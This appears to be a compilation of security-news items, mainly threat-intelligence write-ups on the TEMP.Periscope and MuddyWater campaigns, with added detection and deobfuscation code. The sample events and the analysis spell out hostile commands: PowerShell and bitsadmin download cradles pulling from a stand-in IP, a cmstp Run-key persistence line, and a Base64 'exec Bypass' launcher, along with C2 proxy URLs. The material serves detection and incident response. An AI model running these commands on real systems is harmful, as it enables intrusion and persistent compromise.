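PS_CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "-enc", "frombase64string")


def _norm(e):
    """Lower-case the fields the rules look at: (image, parent image, command line)."""
    return (e["image"].lower(), e.get("parent_image", "").lower(), e.get("command_line", "").lower())


def rule_bitsadmin_download(e):
    image, _, cmd = _norm(e)
    return image.endswith("bitsadmin.exe") and ("/transfer" in cmd or "/addfile" in cmd)


def rule_powershell_download(e):
    image, _, cmd = _norm(e)
    return image.endswith("powershell.exe") and any(m in cmd for m in PS_CRADLE_MARKERS)


def rule_startup_script_host(e):
    image, _, cmd = _norm(e)
    return image.endswith(SCRIPT_HOSTS) and STARTUP_DIR_RE.search(cmd) is not None


def rule_staging_dir(e):
    image, _, cmd = _norm(e)
    return any(image.startswith(d) or d in cmd for d in STAGING_DIRS)


def rule_wmi_spawned_shell(e):
    image, parent, _ = _norm(e)
    return parent.endswith("wmiprvse.exe") and image.endswith(SHELLS)


RULES = {
    "bitsadmin_download": rule_bitsadmin_download,
    "powershell_download": rule_powershell_download,
    "startup_script_host": rule_startup_script_host,
    "staging_dir": rule_staging_dir,
    "wmi_spawned_shell": rule_wmi_spawned_shell,
}


def hunt(events):
    """Return (event id, rule name) for every rule each event trips."""
    return [(e["id"], name) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed sample events (process starts, Sysmon event 1 style).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"svchost.exe -k netsvcs"},
    {"id": 2, "image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin /transfer job /download /priority high http://203.0.113.5/up.dat C:\PerfLogs\up.dat"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"},
    {"id": 4, "image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'wscript.exe "C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.js"'},
    {"id": 5, "image": r"C:\Windows\Debug\svc.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"svc.exe -s"},
    {"id": 6, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /c whoami"},
    {"id": 7, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"chrome.exe --profile-directory=Default"},
]

if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(event_id, rule)
```

These are hunting rules, not alerts: bitsadmin and PowerShell downloads have legitimate administrative uses, so the hits are a triage queue to be joined against the host, the parent process and the destination. The staging-directory rule is the cheapest of the five and the one least likely to fire on normal activity, since nothing ordinary launches from C:\Windows\Debug or C:\PerfLogs.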
Implications
The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.
As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.
Indicators
| File | Hash (MD5) | Description |
|---|---|---|
| x.js | 3fefa55daeb167931975c22df3eca20a | HOMEFRY, a 64-bit Windows password dumper/cracker |
| mt.exe | 40528e368d323db0ac5c3f5e1efe4889 | MURKYTOP, a command-line reconnaissance tool |
| com4.js | a68bf5fce22e7f1d6f999b7a580ae477 | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |
Historical Indicators
| File | Hash (MD5) | Description |
|---|---|---|
| green.ddd | 3eb6f85ac046a96204096ab65bbd3e7e | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |
| BGij | 6e843ef4856336fe3ef4ed27a4c792b1 | Beacon, a commercially available backdoor |
| msresamn.ttf | a9e7539c1ebe857bae6efceefaa9dd16 | PHOTO, also reported as Derusbi |
| 1024-aa6a121f98330df2edee6c4391df21ff43a33604 | bd9e4c82bf12c4e7a58221fc52fed705 | BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration |
U.S. Blames Russia For Cyberattacks On Electricity Grid
U.S. Hits Russia With Sanctions For Election Meddling, Cyber Attacks
Work On It Together – Business Security Weekly #77
This week, Michael and Paul interview Futurist Thornton May, and CSO of Cisco Systems, Inc., Edna Conway! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode77
Visit https://www.securityweekly.com/bsw for all the latest episodes!
Radicati 2018 APT Market Quadrant Report
The Radicati Group has just identified Forcepoint™ as a "Top Player" in their annual Market Quadrant Report for Advanced Persistent Threats (APTs), highlighting our industry leadership.
Insider Trading Charges Brought Against CIO for Post-Breach Trading
On March 14, 2018, the Department of Justice and the Securities and Exchange Commission (“SEC”) announced insider trading charges against a former chief information officer (“CIO”) of a business unit of Equifax, Inc. According to prosecutors, the CIO exercised options and sold his shares after he learned of a cybersecurity breach and before that breach was publicly announced. Equifax has indicated that approximately 147.9 million consumers had personal information that was compromised.
Equifax’s board of directors had previously formed a special committee to investigate trades by certain senior executives that occurred after the breach. Although the timing of those trades drew significant scrutiny from the press, investors and others, the special committee concluded that the executives were not aware of the breach when they sold their shares. It does not appear that the special committee’s investigation covered the CIO’s trades.
According to the SEC’s complaint, the CIO—who was the leading candidate to be the company’s next global CIO—allegedly used confidential information entrusted to him in the course of his employment to conclude that Equifax had suffered a serious breach. The SEC’s investigation relied on a detailed analysis of the CIO’s emails and text messages, and also found that the CIO used a search engine to find information on the Internet concerning the September 2015 cybersecurity breach of Experian, another one of the major credit bureaus, and the impact that breach had on Experian’s stock price. The search terms used by the CIO included: (1) “Experian breach”, (2) “Experian stock price 9/15/2015”, and (3) “Experian breach 2015.”
The SEC alleges that shortly after running these internet searches, but before Equifax’s public disclosure of this data breach, the CIO exercised all of his vested Equifax stock options and then sold the underlying shares, receiving proceeds from the sale of over $950,000. According to the SEC, by selling before public disclosure of the Equifax data breach, the CIO also avoided more than $117,000 in losses that he would have suffered had he not sold until after the news of the breach became public.
This case comes on the heels of the SEC’s recently issued interpretive guidance on cybersecurity. In its guidance, the SEC warned that “information about a company’s cybersecurity risks and incidents may be material nonpublic information, and directors, officers, and other corporate insiders would violate the antifraud provisions if they trade the company’s securities in breach of their duty of trust or confidence while in possession of that material nonpublic information.”
These charges are also an important reminder to companies to (1) educate employees on insider trading laws, (2) implement appropriate internal controls and procedures to oversee trading by senior employees and employees who work in sensitive areas, (3) monitor the exercise of company-issued equity awards, and (4) promptly implement blackout periods covering appropriate personnel upon discovery of a cybersecurity incident.
AV18-043: Adobe Security Bulletins
Cisco Event Response: Microsoft Security Update Release for March 2018
Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign
Introduction
From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.
We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.
One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.
Campaign Timeline
In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.
Figure 1: Timeline of this recently observed spear phishing campaign
The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64-encoded PowerShell command; when WScript.exe runs the VBS file, the VBS file builds a command line that makes PowerShell decode and execute that command. The process chain is shown in Figure 2.
Figure 2: Process chain for the first part of the campaign
Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64-encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.
Figure 3: VBS invoking PowerShell via MSHTA
The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.
Infection Vector
We believe the infection vector for all of the attacks in this campaign was a macro-based document sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:
Figure 4: Sample spear phishing email containing macro-based document attachment
The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow, and a complete list is available in the Indicators of Compromise section at the end of the blog.
Figure 5 shows a document purporting to be from the National Assembly of Pakistan.
Figure 5: Document purporting to be from the National Assembly of Pakistan
A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.
Figure 6: Document purporting to be from the Turkish Armed Forces
A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.
Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology
Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.
Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan
Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.
Indirect Code Execution Through INF and SCT
This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.
The macro in the Word document drops three files into a hard-coded path, C:\programdata. Because that path only exists on Windows 7 and later, execution will only be observed on those operating systems. The three files are:
- Defender.sct – The malicious JavaScript based scriptlet file.
- DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
- WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.
After dropping the three files, the macro will set the following registry key to achieve persistence:
\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersion\Run\"WindowsDefenderUpdater" = cmstp.exe /s c:\programdata\DefenderService.inf
Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct
That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.
Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF
This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.
SCT File Analysis
The code of the Defender.sct file is obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:
powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)
The rest of the malicious activities are performed by the PowerShell Script.
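The two execution chains described above (WScript/MSHTA spawning PowerShell in the first part of the campaign, and the Run key, cmstp.exe and the files dropped into C:\ProgramData in the second) are exactly the kind of endpoint telemetry a detection engineer can match on. The following is an added example, not code from the original post or from FireEye: a small rule set run over constructed Sysmon-style process, file and registry events (the SID, user name and benign events are placeholders invented for the example). It flags Office dropping .sct/.inf/.ini files into C:\ProgramData, Run key values that launch cmstp.exe or another script host, cmstp.exe /s with an INF outside the Windows directory, and PowerShell spawned from mshta.exe/wscript.exe with -exec Bypass or FromBase64String, while leaving the benign events alone.

```python
import re

# Constructed Sysmon-style events (not real telemetry). They mirror the post:
# Word dropping files into C:\ProgramData, the Run key pointing at cmstp.exe,
# cmstp.exe /s <inf>, and PowerShell spawned by mshta.exe with -exec Bypass.
# The SID and user name are placeholders; benign events are mixed in.
WINWORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
RUN_KEY = r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": WINWORD, "TargetFilename": r"C:\ProgramData\Defender.sct"},
    {"EventID": 11, "Image": WINWORD, "TargetFilename": r"C:\ProgramData\DefenderService.inf"},
    {"EventID": 11, "Image": WINWORD, "TargetFilename": r"C:\Users\alice\Documents\report.docx"},
    {"EventID": 13, "Image": WINWORD, "TargetObject": RUN_KEY + r"\WindowsDefenderUpdater",
     "Details": r"cmstp.exe /s c:\programdata\DefenderService.inf"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": RUN_KEY + r"\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmstp.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmstp.exe /s c:\programdata\DefenderService.inf"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString("
                    r"[System.Convert]::FromBase64String((get-content C:\ProgramData\WindowsDefender.ini))))"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Signed Windows binaries abused as launchers from a Run key: cmstp.exe is the one
# in the post; the others are commonly abused the same way.
LOLBIN_LAUNCHERS = {"cmstp.exe", "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
DROPPED_EXTENSIONS = (".sct", ".inf", ".ini")
# cmstp.exe /s <path>.inf; the INF path is captured so its location can be checked.
CMSTP_INF = re.compile(r"/s\s+(?P<inf>\S+\.inf)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Return (rule, detail) findings for the execution chain described in the post."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        image = basename(ev["Image"])
        if eid == 11 and image in OFFICE_APPS:
            target = ev["TargetFilename"]
            low = target.lower()
            # Office writing scriptlet/INF/INI files into C:\ProgramData is the drop stage.
            if low.startswith("c:\\programdata\\") and low.endswith(DROPPED_EXTENSIONS):
                findings.append(("office_drop", target))
        elif eid == 13 and "\\currentversion\\run\\" in ev["TargetObject"].lower():
            details = ev["Details"].lower()
            if any(launcher in details for launcher in LOLBIN_LAUNCHERS):
                findings.append(("run_key_lolbin", ev["TargetObject"]))
        elif eid == 1:
            parent = basename(ev["ParentImage"])
            cmd = ev["CommandLine"]
            if image == "cmstp.exe":
                m = CMSTP_INF.search(cmd)
                # Legitimate connection-manager profiles under the Windows directory are
                # not flagged; anything else needs an allow-list entry or an investigation.
                if m and not m.group("inf").lower().startswith("c:\\windows\\"):
                    findings.append(("cmstp_user_inf", m.group("inf")))
            if image == "powershell.exe" and parent in SCRIPT_HOSTS | OFFICE_APPS:
                low = cmd.lower()
                if "-exec bypass" in low or "frombase64string" in low:
                    findings.append(("scripthost_powershell", parent))
    return findings


if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:22s} {detail}")
```

Each rule on its own is noisy in some environments (cmstp.exe does install INF profiles legitimately), so the useful signal is the combination: the same host showing an Office drop into ProgramData, a Run key launcher and a cmstp.exe or script-host child within a short window.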
PowerShell File Analysis
The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.
Some of the key obfuscation techniques used are:
- Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.
Figure 10: Character replacement and string reversing techniques
- PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
  - $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
  - ($ENV:cOMsPEC[4,26,25]-jOin'')
- XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.
Figure 11: PowerShell script is XOR encoded using a single byte key
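Two of the obfuscation layers listed above are mechanical enough to undo without running the script. Below is an added example (not from the original post or from FireEye) with two analyst helpers: the first resolves the indexed environment-variable expressions quoted above against the default values of $env:PUBLIC and $env:COMSPEC (constructed here; on a real case use the values from the victim host, since the result depends on them), and the second recovers a single-byte XOR key by trying all 256 keys and scoring candidates on printability and PowerShell keywords. The XOR-encoded sample is a constructed snippet, not the real payload or key.

```python
import re

# Default values of the environment variables the script indexes into.
# Constructed for this example; resolve against the values from the host the
# sample ran on, because the recovered string depends on them.
DEFAULT_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "COMSPEC": r"C:\WINDOWS\system32\cmd.exe",
}

# $env:NAME[i] or $env:NAME[i,j,k]; PowerShell variable names are case-insensitive.
ENV_INDEX = re.compile(r"\$env:([a-z_]+)\[([0-9,\s]+)\]", re.IGNORECASE)
LITERAL = re.compile(r"'([^']*)'")


def resolve_env_fragment(expr: str, env=DEFAULT_ENV) -> str:
    """Evaluate a '+'-joined PowerShell expression made of indexed environment
    variables and single-quoted literals, e.g. $env:public[13]+$env:public[5]+'x'."""
    out = []
    for part in expr.split("+"):
        part = part.strip().strip("()")
        m = ENV_INDEX.search(part)
        if m:
            value = env[m.group(1).upper()]
            # [4,26,25]-join'' yields the indexed characters concatenated, so the
            # -join operator needs no separate handling here.
            out.append("".join(value[int(i)] for i in m.group(2).split(",")))
            continue
        lit = LITERAL.fullmatch(part)
        if lit is None:
            raise ValueError(f"unsupported fragment: {part!r}")
        out.append(lit.group(1))
    return "".join(out)


# Constructed PowerShell snippet XOR-encoded with a single-byte key, standing in
# for the encoded section the post describes (the real key and payload are not
# reproduced here).
SAMPLE_PLAINTEXT = (
    "function Get-SysInfo {\n"
    "    $os = Get-WmiObject Win32_OperatingSystem\n"
    "    $name = $env:COMPUTERNAME\n"
    "    return ($os.Caption, $name) -join ';'\n"
    "}\n"
    "Invoke-Expression (Get-SysInfo)\n"
)
SAMPLE_KEY = 0x5A
SAMPLE_XOR_BLOB = bytes(b ^ SAMPLE_KEY for b in SAMPLE_PLAINTEXT.encode())

# Substrings a decoded PowerShell stage is expected to contain; multi-character,
# so a wrong key cannot match them by chance.
KEYWORDS = (b"function", b"invoke", b"-join", b"get-", b"$env:")


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_single_byte_xor(blob: bytes):
    """Try all 256 keys and return (key, plaintext) for the candidate that is
    mostly printable and scores highest on PowerShell keywords, else (None, None)."""
    if not blob:
        return None, None
    best = None
    for key in range(256):
        cand = xor_single_byte(blob, key)
        printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in cand) / len(cand)
        if printable < 0.95:
            continue
        low = cand.lower()
        score = sum(low.count(k) for k in KEYWORDS)
        if best is None or score > best[0]:
            best = (score, key, cand)
    if best is None or best[0] == 0:
        return None, None
    return best[1], best[2].decode("ascii", errors="replace")


if __name__ == "__main__":
    print(resolve_env_fragment("$eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'"))
    print(recover_single_byte_xor(SAMPLE_XOR_BLOB)[0])
```

The keyword scoring is deliberately conservative: a candidate that is printable but contains none of the expected tokens is rejected rather than returned, so the helper says "no key found" instead of handing the analyst garbage when the blob turns out to use a longer key.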
After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.
Section 1
The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:
- TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
- Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
- FIlENAmePATHP = WindowsDefender.ini (file used to store PowerShell code)
- PRIVAtE = Private Key exponents
- PUbLIc = Public Key exponents
- Hklm = "HKLM:\Software\"
- Hkcu = "HKCU:\Software\"
- ValuE = "kaspersky"
- SYSID
- DrAGon_MidDLe = [array of proxy URLs]
Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.
Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server
Section 2
The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.
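Because both exponents ship inside the script, anyone holding the sample can decrypt the exchange in both directions, which is what makes the captured C2 traffic recoverable during incident response. The following is an added illustration, not code from the post or from FireEye, using textbook RSA on a constructed toy key (p=61, q=53, so the modulus is 3233); the post gives neither the key size nor the padding, and the JSON/Base64 framing of the REGISTER message is invented here solely to have something to encrypt and decrypt. Real RSA needs a large modulus and OAEP padding.

```python
import base64
import json

# Constructed toy RSA parameters (p=61, q=53). Both exponents are known, as they
# are in the sample described in the post, so the "private" side is not private.
N = 61 * 53   # 3233
E = 17        # public exponent
D = 2753      # private exponent: 17 * 2753 == 1 (mod lcm(60, 52) = 780)


def rsa_encrypt(message: bytes, e: int, n: int) -> list:
    """Textbook RSA on each byte separately: c = m^e mod n (every byte value < n)."""
    return [pow(m, e, n) for m in message]


def rsa_decrypt(blocks, d: int, n: int) -> bytes:
    return bytes(pow(c, d, n) for c in blocks)


def keypair_consistent(e: int, d: int, n: int, probes=(2, 3, 65, 200)) -> bool:
    """Cheap sanity check on exponents pulled out of a sample: (m^e)^d must give
    m back for a few probe values, which can be verified without the primes."""
    return all(pow(pow(m, e, n), d, n) == m for m in probes)


def wrap_registration(sysinfo: str, e: int = E, n: int = N) -> str:
    """Build a REGISTER message in the shape the post shows and encrypt it.
    The JSON/Base64 framing is constructed for this example."""
    payload = json.dumps({"SYSINFO": sysinfo, "ACTION": "REGISTER"}).encode()
    return base64.b64encode(json.dumps(rsa_encrypt(payload, e, n)).encode()).decode()


def unwrap_message(wire: str, d: int = D, n: int = N) -> dict:
    """What an analyst with the script's exponents can do to a captured message."""
    blocks = json.loads(base64.b64decode(wire))
    return json.loads(rsa_decrypt(blocks, d, n))


if __name__ == "__main__":
    wire = wrap_registration("10.0.0.5;Windows 10;64-bit;HOST1;WORKGROUP;alice")
    print(unwrap_message(wire))
```

The practical takeaway for the responder is that the exponents and modulus lifted from the deobfuscated script are enough to validate (keypair_consistent) and then decrypt any captured session, so the encryption here protects the traffic from casual inspection only, not from anyone who has the sample.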
Section 3
The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.
During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:
The English translation for this message is: “Cannot connect to website, please wait for dragon”.
Other functionalities provided by this section of the PowerShell Script are as follows:
- Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
  - IP Address from Network Adapter Configuration
  - OS Name
  - OS Architecture
  - Computer Name
  - Computer Domain Name
  - Username
All of this data is concatenated and formatted as shown in Figure 13:
Figure 13: Concatenated and formatted data retrieved by PowerShell script
- Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.
While sending to the C2 server, the data is formatted as follows:
@{SYSINFO = $get.ToString(); ACTION = "REGISTER";}
- Ability to take screenshots.
- Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.
Figure 14: System shut down upon discovery of security tools
- Ability to receive a PowerShell script from the C2 server and execute it on the machine. Several techniques are employed for executing the PowerShell code:
  - If the command starts with “excel”, then it leverages the DDEInitiate method of Excel.Application to execute the code.
  - If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code.
  - If the command starts with “risk”, then execution is performed through a DCOM object.
- File upload functionality.
- Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
  - DisableAttachmentsInPV
  - DisableInternetFilesInPV
  - DisableUnsafeLocationsInPV
Figure 15: Disabling Microsoft Office Protected View
- Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.
Figure 16: Reboot, shut down and clean commands
- Ability to sleep for a given number of seconds.
The following table summarizes the main C2 commands supported by this PowerShell Script.
| C2 Command | Purpose |
| --- | --- |
| reboot | Reboot the system using shutdown command |
| shutdown | Shut down the system using shutdown command |
| clean | Wipe the Drives, C:\, D:\, E:\, F:\ |
| screenshot | Take a screenshot of the System |
| upload | Encrypt and upload the information from the system |
| excel | Leverage Excel.Application COM object for code execution |
| outlook | Leverage Outlook.Application COM object for code execution |
| risk | Leverage DCOM object for code execution |
Conclusion
This activity shows us that TEMP.Zagros stays up to date with the latest code execution and persistence techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they slow down reverse engineering and also attempt to evade security products.
Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.
Indicators of Compromise
Macro based Documents and Hashes
| SHA256 Hash | Filename | Targeted Region |
| --- | --- | --- |
| eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894 | na.doc | Pakistan |
| 76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 | Invest in Turkey.doc | Turkey |
| 6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac | güvenlik yönergesi. .doc | Turkey |
| 009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0 | idrbt.doc | India |
| 18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6 | Türkiye Cumhuriyeti Kimlik Kartı.doc | Turkey |
| 3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb | Turkish Armed Forces.doc | Turkey |
| 9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c | na.gov.pk.doc | Pakistan |
| 3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115 | MVD-FORM-1800.doc | Tajikistan |
| cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88 | KEGM-CyberAttack.doc | Turkey |
| 1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942 | IL-1801.doc | Turkey |
| aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627 | kiyiemniyeti.doc | Turkey |
| 93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84 | TCELL-S1-M.doc | Tajikistan |
| c87799cce6d65158da97aa31a5160a0a6b6dd5a89dea312604cc66ed5e976cc9 | egm-1.doc | Turkey |
| 2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13 | Connectel .pk.doc | Pakistan |
| 18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd | gßvenlik_yÜnergesi_.doc | Turkey |
| 153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58 | MIT.doc | Turkey |
| d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025 | Gvenlik Ynergesi.doc | Turkey |
| af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102 | Gvenlik Ynergesi.doc | Turkey |
| 5550615affe077ddf66954edf132824e4f1fe16b3228e087942b0cad0721a6af | NA | Turkey |
| 3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c | Anadolu Güneydoğu Projesinde .doc | Turkey |
Network Indicators
List of Proxy URLs
hxxp://alessandrofoglino[.]com//db_template.php
hxxp://www.easy-home-sales[.]co.za//db_template.php
hxxp://www.almaarefut[.]com/admin/db_template.php
hxxp://chinamall[.]co.za//db_template.php
hxxp://amesoulcoaching[.]com//db_template.php
hxxp://www.antigonisworld[.]com/wp-includes/db_template.php
hxxps://anbinni.ba/wp-admin/db_template.php
hxxp://arctistrade[.]de/wp/db_template.php
hxxp://aianalytics[.]ie//db_template.php
hxxp://www.gilforsenate[.]com//db_template.php
hxxp://mgamule[.]co.za/oldweb/db_template.php
hxxp://chrisdejager-attorneys[.]co.za//db_template.php
hxxp://alfredocifuentes[.]com//db_template.php
hxxp://alxcorp[.]com//db_template.php
hxxps://www.aircafe24[.]com//db_template.php
hxxp://agencereferencement.be/wp-admin/db_template.php
hxxp://americanlegacies[.]org/webthed_ftw/db_template.php
hxxps://aloefly[.]net//db_template.php
hxxp://www.duotonedigital[.]co.za//db_template.php
hxxp://architectsinc[.]net//db_template.php
hxxp://www.tanati[.]co.za//db_template.php
hxxp://emware[.]co.za//db_template.php
hxxp://breastfeedingbra[.]co.za//db_template.php
hxxp://alhidayahfoundation[.]co[.]uk/category/db_template.php
hxxp://cashforyousa[.]co.za//db_template.php
hxxps://www.airporttaxi-uk[.]co[.]uk/wp-includes/db_template.php
hxxp://antjetaubert[.]de//db_template.php
